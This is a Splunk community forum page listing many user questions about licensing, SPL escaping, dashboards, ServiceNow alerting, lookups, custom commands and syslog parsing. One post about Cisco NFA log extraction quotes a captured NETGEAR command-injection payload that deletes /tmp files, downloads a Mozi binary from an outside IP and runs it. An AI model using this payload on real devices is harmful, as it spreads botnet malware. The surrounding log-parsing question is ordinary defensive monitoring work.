All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

Hello, We recently installed Splunk, we thought we had a free license, however we got a notice that we have exceeded the quota and the license has been blocked. We have changed the license group to ... See more...
Hello, We recently installed Splunk, we thought we had a free license, however we got a notice that we have exceeded the quota and the license has been blocked. We have changed the license group to free, however the search is still blocked. How can we unlock it? Thank you very much and greetings!
Hi, I have created a watchlist, AWS_IPs and added IP addresses to it. Further, I have created anomaly action rule to reduce the anomaly score by 3 and added AWS_IPs watchlist to it. But I do not se... See more...
Hi, I have created a watchlist, AWS_IPs and added IP addresses to it. Further, I have created anomaly action rule to reduce the anomaly score by 3 and added AWS_IPs watchlist to it. But I do not see this AAR getting applied to anomalies that have IP address which are listed in watchlist. Can anyone please suggest what could the reason behind it and how can I resolve it. Thanks!
Hi All, Can we leverage AppDynamics for updating CMDB (Service Now or any other CMDB) based on auto-discovery it does for applications.
I have a dashboard which has two panels; one of them shows the errors and the count of how many times similar error has occurred. Another panel shows the details of the error when clicked on an error... See more...
I have a dashboard which has two panels; one of them shows the errors and the count of how many times similar error has occurred. Another panel shows the details of the error when clicked on an error. This error string sometimes has characters like <,>,\, etc. and splunk does not read them as string but characters, which results in error on the panel. I would like to use something which would escape all the possible characters in one go. Currently, my query looks like this: index=index_name sourcetype="sourcetype_name"  [ | makeresults | eval cleansearch=replace(replace("$search$", "<", "\<"), ">", "\>") | return $cleansearch] Is there anything more simpler that I could use that would escape all the possible characters that could cause an issue instead of replacing each character individually?
Hi all, I was wondering what are the steps involved in developing a splunk alert that creates an incident ticket on Service Now - this ticket would be updated if further alerts are triggered by the ... See more...
Hi all, I was wondering what are the steps involved in developing a splunk alert that creates an incident ticket on Service Now - this ticket would be updated if further alerts are triggered by the same folder/account. E.g. Splunk alert is triggered an incident ticket is created. The same splunk alert is triggered for the same person/folder/entity instead of creating a new incident ticket it appends onto the one created and open   I've found some doc's on integrating Splunk and Snow together. But in regards to establishing the alert side of things the documentation to do so seems out dated; "Scripted Alert is now a deprecated Splunk feature. The best practice is to use custom alert actions instead."  If thats the case how should I implement the splunk alert? 
I have a Splunk dashboard as follows with some input fields.  Now As you can see above by default the input value for host column is wild card * . Now, If I click the checkbox "show" under Laten... See more...
I have a Splunk dashboard as follows with some input fields.  Now As you can see above by default the input value for host column is wild card * . Now, If I click the checkbox "show" under Latency validation check it will display a panel below it.  Now, as a good practice how do I disable executing the search when some one used the wild card in host input as the input will be used as a token for the search.  I mean only when a valid hostname is given as an input for Host the search should execute for the Latency Validation check.  Note :- Here I need the wild card as a default entry for host input as there are some other panels which uses that wild card but I only wanted to restrict the use of wild card to only one particular panel.    Code can be found below :-        <input type="text" token="host"> <label>Host</label> <default>*</default> </input> <input type="checkbox" token="overview"> <label>Latency Validation Check</label> <choice value="true">Show</choice> <change> <condition label="Show"> <set token="overview">true</set> </condition> </change> </input>      
I am trying to set up an index page in splunk studio dashboard, which redirects to other splunk dash boards based on dropdown. dropdown has three values, based on value dashboard will be updated with... See more...
I am trying to set up an index page in splunk studio dashboard, which redirects to other splunk dash boards based on dropdown. dropdown has three values, based on value dashboard will be updated with that category dashboards list, where on click it redirects to that category splunk dashboard. Say for example, in below image 1, type is B-004. Both the boxes are updated with same links given in static input. I was expecting BOX1 being updated with https://B-004/logs and BOX 2 being updated with https://B-004/results as in image 2. please find the code below. And what would be SPL if want to give a string name(any) instead number for URL display. Appreciate your help. thanks in advance. image 1: image 2: code  for image 1: {     "visualizations": {         "viz_Hpfgo6KN": {             "type": "viz.rectangle",             "options": {                 "stroke": "transparent",                 "fill": "#1A1C20",                 "rx": 4             }         },         "viz_lto5aays": {             "type": "viz.text",             "options": {                 "content": "box1",                 "fontSize": 14,                 "fontWeight": "bold",                 "textColor": "#FBFBFB"             }         },         "viz_AJxRjGHA": {             "type": "abslayout.line",             "options": {                 "strokeColor": "#33343B"             }         },         "viz_ZI34ttXn": {             "type": "viz.singlevalue",             "options": {                 "backgroundColor": "#ffffff"             },             "dataSources": {                 "primary": "ds_pQ72LSdV"             },             "eventHandlers": [                 {                     "type": "drilldown.customUrl",                     "options": {                         "url": "$myWebsiteToken$",                         "newTab": true                     }                 }             ]         },         "viz_Nd21m86c": {             "type": "viz.rectangle",             "options": {                 "stroke": "transparent",                 "fill": "#1A1C20",                 "rx": 4             }         },         "viz_icJmS4Ub": {             "type": "viz.text",             "options": {                 "content": "box2",                 "fontSize": 14,                 "fontWeight": "bold",                 "textColor": "#FBFBFB"             }         },         "viz_mSmorwn2": {             "type": "viz.singlevalue",             "options": {                 "backgroundColor": "#ffffff"             },             "dataSources": {                 "primary": "ds_gy5Vi8dr_ds_pQ72LSdV"             },             "eventHandlers": [                 {                     "type": "drilldown.customUrl",                     "options": {                         "url": "$myWebsiteToken$",                         "newTab": true                     }                 }             ]         }     },     "dataSources": {         "ds_pQ72LSdV": {             "type": "ds.search",             "options": {                 "query": "index= _internal\n| stats count",                 "queryParameters": {                     "earliest": "-4h@m",                     "latest": "now"                 }             },             "name": "Search_1"         },         "ds_gy5Vi8dr_ds_pQ72LSdV": {             "type": "ds.search",             "options": {                 "query": "index= _internal\n| stats count",                 "queryParameters": {                     "earliest": "-4h@m",                     "latest": "now"                 }             },             "name": "Copy of Search_1"         }     },     "inputs": {         "staticInput": {             "type": "input.dropdown",             "options": {                 "items": [                     {                         "label": "A-002",                         "value": "https://A-002/"                     },                     {                         "label": "B-004",                         "value": "https://B-004/"                     },                     {                         "label": "C-005",                         "value": "https://C-005/"                     }                 ],                 "token": "myWebsiteToken"             },             "title": "type"         }     },     "layout": {         "type": "absolute",         "options": {             "height": 1100,             "showTitleAndDescription": false,             "backgroundColor": "#111215",             "width": 1500,             "display": "auto-scale"         },         "globalInputs": [             "staticInput"         ],         "structure": [             {                 "item": "viz_Hpfgo6KN",                 "type": "block",                 "position": {                     "x": 0,                     "y": 0,                     "w": 390,                     "h": 360                 }             },             {                 "item": "viz_lto5aays",                 "type": "block",                 "position": {                     "x": 0,                     "y": 0,                     "w": 300,                     "h": 50                 }             },             {                 "item": "viz_AJxRjGHA",                 "type": "line",                 "position": {                     "from": {                         "x": 1496,                         "y": 212                     },                     "to": {                         "x": -3,                         "y": 212                     }                 }             },             {                 "item": "viz_ZI34ttXn",                 "type": "block",                 "position": {                     "x": 70,                     "y": 120,                     "w": 250,                     "h": 130                 }             },             {                 "item": "viz_Nd21m86c",                 "type": "block",                 "position": {                     "x": 400,                     "y": 0,                     "w": 390,                     "h": 360                 }             },             {                 "item": "viz_icJmS4Ub",                 "type": "block",                 "position": {                     "x": 430,                     "y": 20,                     "w": 300,                     "h": 50                 }             },             {                 "item": "viz_mSmorwn2",                 "type": "block",                 "position": {                     "x": 500,                     "y": 140,                     "w": 250,                     "h": 130                 }             }         ]     },     "description": "Viz Description Here",     "title": "testing_index" }
Hi monitoring Postgres databases using Prometheus server and setup alerts using alert manager however trying to integrate alerting from alert manager in Prometheus to Splunk using http endpoint and ... See more...
Hi monitoring Postgres databases using Prometheus server and setup alerts using alert manager however trying to integrate alerting from alert manager in Prometheus to Splunk using http endpoint and Hec in splunk   please suggest if it is possible if yes then how 
Hello All,   I am trying to calculate the Average of a column, but i want it to ignore all values that are equal to 0.   This currently what I have right now:    stats avg(ComplianceScore) as C... See more...
Hello All,   I am trying to calculate the Average of a column, but i want it to ignore all values that are equal to 0.   This currently what I have right now:    stats avg(ComplianceScore) as CS by GeoLocation   But I need it to calculate AVG only if Compliance Score is not Zero.    Thank you, Marco  
1. How can a non admin user access Splunk REST APIs? 2. After getting session key, search id and search status we are trying to get search results. But it is showing null.   curl -u $user:$password... See more...
1. How can a non admin user access Splunk REST APIs? 2. After getting session key, search id and search status we are trying to get search results. But it is showing null.   curl -u $user:$password -k https://localhost:8089/servicesNS/admin/search/search/jobs/sid/results/ --get   Any comments are much appreciated.  Thank you
Cisco logs with json format is not extracting properly. I tried from GUI using this kv delims in search and they are working fine. | kv pairdelim="," kvdelim="=:" But how can i save them?. Or do we... See more...
Cisco logs with json format is not extracting properly. I tried from GUI using this kv delims in search and they are working fine. | kv pairdelim="," kvdelim="=:" But how can i save them?. Or do we have any alternate way to extract these fields. 2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"} 2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}
Hey Splunkers. Quick question regarding my lookup. I have the Identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbrev... See more...
Hey Splunkers. Quick question regarding my lookup. I have the Identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbreviated) identity lookup looks like this:     identity prefix nick priority ------ ------ ------- --------- asmith (blank) Adam Smith medium cjean (blank) Carol Jean medium bjean (blank) Billy Jean medium     I'd like to replace the priority value 'medium' in the above lookup with the value that matches my separate lookup that looks like:     identity priority ------ --------- asmith high cjean low     So the original lookup would look like:     identity prefix nick priority ------ ------ ------- --------- asmith (blank) Adam Smith high cjean (blank) Carol Jean low bjean (blank) Billy Jean medium     I'm having trouble getting started on the search. How would I do this so that matches are updated but if no match is present than keep the original value? Thanks!
I made a custom TA in "/opt/splunk/etc/apps/myTA/". I created a script called "myTA/bin/scripts/pulldata.sh". My script makes temp files and it attempts to save in "myTA/bin/scripts/", but it has err... See more...
I made a custom TA in "/opt/splunk/etc/apps/myTA/". I created a script called "myTA/bin/scripts/pulldata.sh". My script makes temp files and it attempts to save in "myTA/bin/scripts/", but it has errors writing to that path. I can run the script in CLI using "./pulldata.sh" as the splunk user and it is fine to write the temp files to the "scripts" directory. I tried to use "/opt/splunk/bin/splunk cmd /opt/splunk/etc/apps/myTA/scripts/pulldata.sh", but that also has issues writing the temp files. I'm assuming that Splunk only lets the scripts write files in specific directories. Is there a specific/correct location that I should be placing these temp files? I'm thinking I can write to "/opt/splunk/var/log/splunk", but I want to see what the Splunk recommended path if for this kind of stuff . I remember seeing information about this at some point on dev.splunk.com, but can't seem to find it anymore. This is what I have been looking at: https://dev.splunk.com/enterprise/docs/developapps/createapps/appanatomy/ Thanks in advance!
I have a dashboard (form) where I have a dropdown to choose between two different types of "changes" that may have happened in one of our environments.  When one of the dropdowns is chosen, a table i... See more...
I have a dashboard (form) where I have a dropdown to choose between two different types of "changes" that may have happened in one of our environments.  When one of the dropdowns is chosen, a table is populated with results. The dropdown menu is configured: <choice value="index=something blah blah blah | table 1 2 3">Config Change</choice> <choice value="index=another_index blah blah blah | table 7 8 9">Admin Change</choice> The table portion is configured: <query>$tok_change$</query> This all works great.  I have a need to eval a field called Name in the Config Change "choice".  This Name field will have a value of "A change to the system was made." The comes in when I add the following to the SPL: eval Name="A change to the system was made" I receive the following message: "Error on line 8: Invalid attribute name" I figure it has something to do with the quote in the eval statement but I can't make this happen.  Any help / guidance is greatly appreciated.  
We re trying to iterate results rows and columns in the same order as the table before the custom command, the 'records' object in the custom command code iterates in order by row, but changes the or... See more...
We re trying to iterate results rows and columns in the same order as the table before the custom command, the 'records' object in the custom command code iterates in order by row, but changes the order of the columns.   def reduce(self, records): for record in records: yield record   This example of the reduce method of a ReportingCommand prints the results in a different column order than the original search. We need to iterate 'records' in the same order of rows and columns. Any ideas?
Ive uploaded the Splunk tutorial data successfully into my Splunk enterprise instance.  There is also a prices.csv.zip. Do I upload that file the exact same way as the tutorialdata.zip?
I am currently using the Splunk TA for Palo Alto data.  And I'm ingesting data from Cortex Data Lake to a new Azure Syslog server. But there is a large problem with the data we're ingesting.  The da... See more...
I am currently using the Splunk TA for Palo Alto data.  And I'm ingesting data from Cortex Data Lake to a new Azure Syslog server. But there is a large problem with the data we're ingesting.  The data being sent is literally missing a single field.  Below is a reference of what we should be ingesting: Configuration Syslog Field Order (paloaltonetworks.com) If you look at the example from this link, you will see this log:   Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z But what I'm receiving is: Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z In the log I'm receiving, I'm missing a comma (,) before the 2020 in this line: harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z   I should be receiving data that looks like this:   harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z   I'm at a loss where this data is generated.  If this is data generated by a syslog server, the unix server hosting syslog, or if it's on the Palo Alto Cortex Data Lake side of things. The logs are passed through our firewall and towards the syslog server.   I believe this field is either 'log_source_id' or 'log_type.value'.  But outside of that, I'm at a loss as to where this value is generated.  Any help is appreciated.   - TitanAE    
The python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but when using the debugger it crashes at the dispatc... See more...
The python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but when using the debugger it crashes at the dispatch() function and returns the following traceback:   Traceback (most recent call last): File "/opt/splunk/etc/apps/<app>/bin/<command>.py", line 149, in <module> dispatch(exportExcel, sys.argv, sys.stdin, sys.stdout, __name__) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 1144, in dispatch command_class().process(argv, input_file, output_file, allow_empty_input) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 450, in process self._process_protocol_v2(argv, ifile, ofile) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 788, in _process_protocol_v2 self._record_writer.write_metadata(self._configuration) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 813, in write_metadata self._write_chunk(metadata, '') File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 843, in _write_chunk self.write(start_line) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 557, in write self.ofile.write(data) File "/opt/splunk/etc/apps/SA-VSCode/bin/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_io.py", line 40, in write r.write(s) TypeError: write() argument must be str, not bytes   The custom running code is similar to the python examples in the SDK repo in: https://github.com/splunk/splunk-sdk-python/tree/master/examples/searchcommands_app/package/bin Any help ll be appreciated.
We have upgraded from 8.1.6 to 8.1.7.2 and we are not able to see the resource details in the overview page. PFA screenshot. Kindly advise. Is this known issue ? 
Hi, i looked for an answer an some came close. But i could not get it flying. Here is the Problem Description: I have a field that contains the status of a ticket ("created_done"). I can easily c... See more...
Hi, i looked for an answer an some came close. But i could not get it flying. Here is the Problem Description: I have a field that contains the status of a ticket ("created_done"). I can easily count the number using by or doing that: | stats count(eval(created_done="created")) as created count(eval(created_done="done")) as done by title impact However i would like something like this: | stats count by title impact status status at this point should be a field holding the sum of solved tickets and the sum of open tickets: Title Impact Status Count title 1 impact 1 solved 90 title 1 impact 1 open 5 title 1 impact 2 solved 45 title 1 impact 2 open 3   Probably this has already been answered, i apologize in advance, but i could not get any solution working.   Kind regards, Mike